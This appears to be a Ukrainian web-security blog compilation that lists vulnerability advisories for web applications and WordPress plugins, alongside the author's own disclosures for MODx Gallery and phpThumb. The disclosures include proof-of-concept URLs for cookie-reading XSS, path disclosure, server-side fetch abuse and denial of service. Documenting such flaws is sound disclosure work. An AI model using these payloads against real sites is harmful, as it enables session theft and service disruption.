Websecurity - Веб безпека

В даній добірці уразливості в веб додатках:

• EMC Connectrix Manager Converged Network Edition Remote Code Execution Vulnerabilities (деталі)
• cacti security update (деталі)
• SQL Injection Vulnerability in ArticleFR (деталі)
• ArcGIS for Server Vulnerability Disclosure (деталі)
• EMC Data Protection Advisor DPA Illuminator EJBInvokerServlet Remote Code Execution (деталі)

В даній добірці уразливості в веб додатках:

• Open-Xchange Security Advisory 2014-03-17 (деталі)
• Apache OFBiz Cross-site scripting (XSS) vulnerability (деталі)
• check_mk vulnerabilities (деталі)
• cacti security update (деталі)
• Open-Xchange Security Advisory 2014-01-17 (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Disqus, WPtouch Mobile, Slideshow Gallery, Huge IT Image Gallery та різних темах. Для котрих з’явилися експлоіти. Disqus - це плагін для написання коментарів, WPtouch Mobile - це плагін, що додає елегантну мобільну тему для мобільних відвідувачів сайта, Slideshow Gallery - це плагін для створення галереї зображень зі слайдшоу, Huge IT Image Gallery - це плагін для створення галереї зображень та теми Ultimate, IncredibleWP, Ultimatum, Medicate, Centum, Avada, Striking, Beach, CuckooTap, eShop.

• WordPress Disqus 2.7.7 Cross Site Request Forgery (деталі)
• WordPress WPtouch Mobile 3.4.5 Shell Upload (деталі)
• WordPress Slideshow Gallery 1.4.6 Shell Upload (деталі)
• WordPress Multiple Themes Arbitrary File Download (деталі)
• WordPress Huge IT Image Gallery 1.0.0 SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• EMC Watch4net Information Disclosure Vulnerability (деталі)
• Opendaylight Vulnerable to Local and Remote File Inclusion in the Netconf (TCP) Service (деталі)
• drupal7 security update (деталі)
• Reflected Cross-Site Scripting (XSS) in Jamroom (деталі)
• Open-Xchange Security Advisory 2014-02-10 (деталі)

У липні, 31.07.2014, я виявив численні уразливості в Gallery для MODx. Зокрема Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service уразливості. Про що найближчим часом повідомлю розробникам веб додатку.

В компоненті Gallery для MODx використовуються phpThumb. Ця бібліотека має XSS, FPD, AoF і DoS в уразливості подібні до TimThumb, тому Gallery теж вразливий.

XSS (WASC-08):

http://site/assets/components/gallery/connector.php?action=web/phpthumb&src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/assets/components/gallery/connector.php?action=web/phpthumb
http://site/assets/components/gallery/connector.php?action=web/phpthumb&src=http://

Abuse of Functionality (WASC-42):

http://site/assets/components/gallery/connector.php?action=web/phpthumb&src=http://site&h=1&w=1

Denial of Service (WASC-10):

http://site/assets/components/gallery/connector.php?action=web/phpthumb&src=src=http://site/big_file&h=1&w=1

Уразливі всі версії компонента Gallery для MODx.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Disqus, All In One SEO Pack та ShortCode. Для котрих з’явилися експлоіти. Disqus - це плагін для написання коментарів, All In One SEO Pack - це плагін для пошукової оптимізації сайта, ShortCode - це мега пакет коротких кодів.

• Disqus 2.7.5 Cross Site Request Forgery / Cross Site Scripting (деталі)
• WordPress All In One SEO Pack 2.2.2 Cross Site Scripting (деталі)
• WordPress ShortCode 0.2.3 Local File Inclusion (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• RSA Security Analytics Multiple Vulnerabilities (деталі)
• TomatoCart v1.x (latest-stable) Multiple Vulnerabilities (деталі)
• Multiple Cross-Site Scripting vulnerabilities in OCS Inventory NG (деталі)
• Apache Cordova 3.5.1: CVE-2014-3502 update (деталі)
• EMC Replication Manager Unquoted File Path Enumeration Vulnerability (деталі)

У січні, 24.01.2015, я виявив Abuse of Functionality, Brute Force та Cross-Site Request Forgery уразливості в D-Link DCS-910 (веб камера).

Раніше я писав про уразливості в пристроях даної компанії, зокрема в D-Link DVG-5402SP та D-Link DCS-910.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Disqus, Mobile Pack та KenBurner Slider. Для котрих з’явилися експлоіти. Disqus - це плагін для написання коментарів, Mobile Pack - це плагін для перетворення сайта у мобільний веб додаток, KenBurner Slider - це плагін для створення слайдеру.

• WordPress Disqus 2.7.5 CSRF / Cross Site Scripting (деталі)
• WordPress Mobile Pack 2.0.1 Information Disclosure (деталі)
• WordPress KenBurner Slider Arbitrary File Download (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Ще у березні, 05.03.2011, я виявив численні уразливості в phpThumb. Зокрема Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service уразливості. Про що найближчим часом повідомлю розробникам веб додатку.

Цей веб додаток зроблений на основі TimThumb і має подібні XSS, FPD, AoF і DoS уразливості.

XSS (WASC-08):

http://site/phpThumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/phpThumb.php
http://site/phpThumb.php?src=http://

Abuse of Functionality (WASC-42):

http://site/phpThumb.php?src=http://site&h=1&w=1

Denial of Service (WASC-10):

http://site/phpThumb.php?src=src=http://site/big_file&h=1&w=1

Уразливі всі версії phpThumb та веб додатки, що його використовують.